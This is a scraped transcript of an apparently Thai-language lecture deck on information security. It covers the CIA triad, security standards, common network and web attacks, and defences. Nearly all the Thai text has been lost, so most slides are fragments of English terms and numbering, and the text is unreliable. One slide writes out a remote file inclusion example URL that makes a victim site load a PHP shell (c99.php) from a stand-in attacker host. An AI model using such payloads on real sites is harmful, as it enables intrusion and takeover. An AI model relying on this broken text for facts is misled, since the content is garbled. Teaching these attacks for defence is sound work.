1 ... - PowerPoint PPT Presentation

 1 ...
Download
1 / 92

  • 91 Views
  • Updated On :
  • Presentation posted in: General
loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha

Download Presentationdownload

1 ...

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Slide1 l.jpg

1

.


Slide2 l.jpg

1.

4

1.1

4


Slide3 l.jpg

:

Linux / Windows Core Switch, Router Firewall


Slide4 l.jpg

/ / Back Door:

(copy) () Back Door Trojan


Slide5 l.jpg

/ :

Access Point Wireless LAN Layer2 Switch, Access Point


Slide6 l.jpg

1.2

( ) ( Application Web Application) (DoS: Denial of Service) //


Slide7 l.jpg

:

sa SQL Server Windows Server password Terminal Service


Slide8 l.jpg

:

Application () Web Application remote exploit Metasploit ( Shell command) // Linux Command Windows Command ftp, tftp, scp wget Back Door


Slide9 l.jpg

:

DoS (Denial of Service) exploit DoS DoS ARP, ICMP, TCP


Slide10 l.jpg

- / / :

Client Windows XP / Vista Windows Server 2003 / 2008 Windows Server Windows Client Download ( Client ) DoS netcut


Slide11 l.jpg

1.3

  • (Authentication) Authentication MAC Address


Slide12 l.jpg

  • - MAC Address

    - ARP Spoof/Poisoning

    - Rough DHCP

    - Wireless LAN

    - Hardening (firmware)


Slide13 l.jpg

1.4

Database Server / /


Slide14 l.jpg

SQL Injection Database XSS Cookie / Session ID Webmaster Webmaster Webmaster Database

Database e-commerce


Slide15 l.jpg

2.

3 CIA Confidentiality, Integrity Availability

  • Confidentiality ()

  • Integrity ()

  • Availability ()


Slide16 l.jpg

Intregrity

Availability

Infosec

Confidentiality

(CIA)


2 1 confidentiality l.jpg

2.1 Confidentiality ()

" ?" (Who is authorized to use data?) somsri@msu.ac.th somsak@msu.ac.th, sompong@msu.ac.th somkid@msu.ac.th


Slide18 l.jpg

(Access Control) username password (Cryptography & Encryption) SSL https


2 2 integrity l.jpg

2.2 Integrity ()

() " ?"(Is data good?) ( ) Somsri (file) thawatchai somsri


Slide20 l.jpg

Checksum checksum MD5 Linux checksum Tripwire (Cryptography & Encryption)


2 3 availability l.jpg

2.3 Availability ()

" ?" (Can access data whenever need it?) mail.msu.ac.th (DoS Attack: Denial of Service Attack) somsri@msu.ac.th, somsak@msu.ac.th thawatchai@msu.ac.th Mail Backup


Slide22 l.jpg

Load Balanzing, Fail Over, Back Up, Hardening DoS


Slide23 l.jpg

2.4

  • Authentication

  • Authorization

  • Non-repudiation


Slide24 l.jpg

2.4.1 Authentication

Authentication username password

- : username password

- :

- :


Slide25 l.jpg

2.4.2 Authorization

Authorization (Authentication) admin / Guest


Slide26 l.jpg

2.4.3 Non-repudiation

Non-repudiation ()


Slide27 l.jpg

E-commerce

- / (Confidentiality)

- / (Authentication)

- / (Integrity)

- (Non-repudiation)


Slide28 l.jpg

3.

(Hacker) Virus, Worm


3 1 threat l.jpg

3.1 (Threat)

- (Hacker)

- Virus, Worm

-

-


Hacker l.jpg

(Hacker)

(Vulnerability)

(Risk) (Tools) CERT.ORG


Virus worm l.jpg

Virus, Worm

Virus Worm Anti Virus Worm patch Virus Worm Virus Worm


Slide33 l.jpg

Remote Exploit


Slide34 l.jpg

Backup DR Site (Disaster Recovery Site) (Recovery)


3 2 accidental l.jpg

3.2 (Accidental)

Hardware software /


Slide36 l.jpg

(Physical) UTP / STP / Coaxial Core Switch


Hardware software l.jpg

Hardware software /

Hardware software hard disk Backup hardware software Backup


Slide38 l.jpg

Low-level ( format ) Backup


Slide39 l.jpg

4.

( ISO / IEC270001)


4 1 iso iec270001 l.jpg

4.1 ISO / IEC270001

ISO/IEC27001 ISO / IEC27001:2005 ISMS (Information Security Management System) ISO (The International Organization for Standardization) IEC (The International Electrotechnical Commission) ISMS ISMS


Iso iec27001 2005 l.jpg

ISO/IEC27001:2005

ISO/IEC27001:2005 11

1) (Security Policy)

2) (Organization of information security)

3) (Asset Management)

4) (Human Resources Security)

5) (Physical and Environmental Security)


Iso iec27001 200542 l.jpg

ISO/IEC27001:2005

6) (Communications and Operations Management)

7) (Access Control)

8) (Information Systems Acquisition, Development and Maintenance)

9) (Information Security Incident Management)

10) (Business Continuity Management)

11) (Compliance)


Iso iec27001 pdca plan do check act l.jpg

ISO/IEC27001 PDCA (Plan-Do-Check-Act)


4 2 iso iec tr 13335 l.jpg

4.2 ISO/IEC TR 13335

Guidelines for the Management of IT Security ISO/IEC2007 technical report


Slide45 l.jpg

5

1.

2.

3.

4.

5.


4 3 iso iec 15408 2005 common criteria itsec l.jpg

4.3 ISO/IEC 15408:2005/Common Criteria/ ITSEC

Communication Security Establishment Central Service of the Information Federal Office for Security in Information Technology The Netherlands National Communications Security Agency Communications-Electronics Security Group National Institute of Standards and Technology and National Security Agency


4 4 itil l.jpg

4.4 ITIL

ITIL Information Technology Infrastructure Library CCTA OGC ITIL


Slide48 l.jpg

ITIL IT Service IT Service ITIL 8

1) (Software and Asset Management)

2) (Service Delivery)

3) (Service Support)

4) (Planning to Implement Service Management)

5) (ICT Infrastructure Management)

6) (Application Management)

7) (Security Management)

8) (Business Perspective, Volume II)


4 5 fips pub 200 l.jpg

4.5 FIPS PUB 200

FIPS PUB 200 The Federal Information Processing Standards Publication 200


Slide50 l.jpg

FIPS PUB 200 FIPS

1)

2)

3)

4)


4 6 nist 800 14 l.jpg

4.6 NIST 800-14

NIST 800-14 National Institute of Standards and Technology 800-14 Generally Accepted Principles and Practices for Securing Information Technology Systems NIST 800-14 Computer Security 8


Slide52 l.jpg

1)

2)

3)

4)

5)

6)

7)

8)


4 7 it bpm l.jpg

4.7 IT BPM

IT BPM Information Technology Baseline Protection Manual BSI IT BPM


Slide54 l.jpg

1)

2)

3)

4)

5)


4 8 cobit l.jpg

4.8 COBIT

COBIT (Control Objetives for Information and related Technology) ISACA "" (IT Governace) COBIT COBIT "" "" COBIT "" ""


4 9 coso l.jpg

4.9 COSO

COSO The Committee of Sponsoring Organizations of the Treadway Commissoin COSO


Slide57 l.jpg

5.

  • /

  • MITM

  • DoS

  • Web Application

  • LAN Wireless LAN


Slide58 l.jpg

/

Sniffer, Ethereal Wireshark Switch ARP Spoof Gateway Gateway Cookie/Session ID


Slide60 l.jpg

MITM

ARP Spoof Gateway Gateway MITM (Man In The Middle) Certificate https MITM https


Slide61 l.jpg

DoS

DoS Denial of Service packet ( )


Web application l.jpg

Web Application

Web Application ( 80)

1) SQL Injection

2) Session Hijacking

3) XSS: Cross Site Scripting

4)Remote File Inclution


Sql injection l.jpg

SQL Injection

SQL SQL Injection Option, Drop down List Cookie Database


Session hijacking l.jpg

Session Hijacking

Session Session Hijacking Session TCP ( Kevin Mitnik TCP Session 1995) Session Hijacking Session Web Application HTTPS Session


Xss cross site scripting l.jpg

XSS: Cross Site Scripting

Script Java Script Script Script Script Script Cookie Cookie Session ID Session ID


Remote file inclution l.jpg

Remote File Inclution

.php .asp Header Library

http://www.victim.com/show.php?page=main.html

http://www.victim.com/show.php?page=http://hacker.com/c99.php

php shell Linux / Windows Command


Lan wireless lan l.jpg

LAN Wireless LAN

LAN MAC Address MAC Address NAC: Network Access Control MAC Address Active MAC Address MAC Address Changer


Slide68 l.jpg

Wireless LAN Authentication Network Access Control MAC Address Wireless LAN MAC Address MAC Address Access Point MAC Address Active Wireless LAN


Slide69 l.jpg

Wireless LAN WEP WEP WEP Back Track (http://www.remote-exploit.org) Wireless LAN Wireless LAN WPA WEP cowpatty Back Track WPA


Slide70 l.jpg

  • Remote Exploit: Metasploit IP Address Shell Command root Administrator


Slide71 l.jpg

  • Remote Crack: Remote Crack Dictionary Attack Bruteforce Attack generate 1


Slide72 l.jpg

6.


Slide73 l.jpg

6.1

(Vulnerability)

(Vulnerability) Web Application Worm


Slide74 l.jpg

(Threat)

(Threat) ( )


Slide75 l.jpg

(Criticality)

(Criticality) (System and data criticality) (Vulberable criticality)

- (System and data criticality) ()

- (Vulberable criticality)


Slide76 l.jpg

(Risk)

(Risk) Database


Slide77 l.jpg

(Risk) (Vulnerability) (Threat) (Criticality)


Slide78 l.jpg

6.2

10

1 ()

2 Black Box White Box

3

4


Slide79 l.jpg

5 Downtime ( Downtime )

6

7

8

9

10


Slide80 l.jpg

6.3

6.3.1

10 2-3 0


Slide81 l.jpg

:

() Service Pack Anti Virus Firewall IDS/IPS permission ( telnet ftp)


Slide82 l.jpg

LAN:

MITM Switch MAC Filter IP Filter Static ARP Authen username password Rough DHCP IP Address MAC Address , Anti Virus Personal Firewall Client


Slide83 l.jpg

Wireless LAN:

WPA username password Access Point Rough AP MAC Address


Slide84 l.jpg

Web Application:

SQL Injection, XSS (Cross Site Scripting), Remote File Inclusion, Session Hijacking, file permission Directory Browsing , IIS/Apache/PHP https


Slide85 l.jpg

:

Firewall Policy DR Site (Disaster Recovery Site)


Slide86 l.jpg

6.3.2

DMZ IDS /IDS

Internal Network


Slide87 l.jpg

() DMZ (Demilitarized Zone)


Slide88 l.jpg

( Web Application 80 ) IDS: IntrustionDtection System IDS IPS IPS Intrusion Prevension System (IPS IDPS: Intrusion DectionPrevension System)

Firewall IDS/IPS office Data Center


Slide89 l.jpg

6.3.3

Anti Virus (Social Engineering) (Phishing)


Slide90 l.jpg

SQL Injection, XSS: Cross Site Scripting Remote File Inclution

Tools


Slide91 l.jpg

6.3.4

3


Slide92 l.jpg

7.

https


ad
  • Login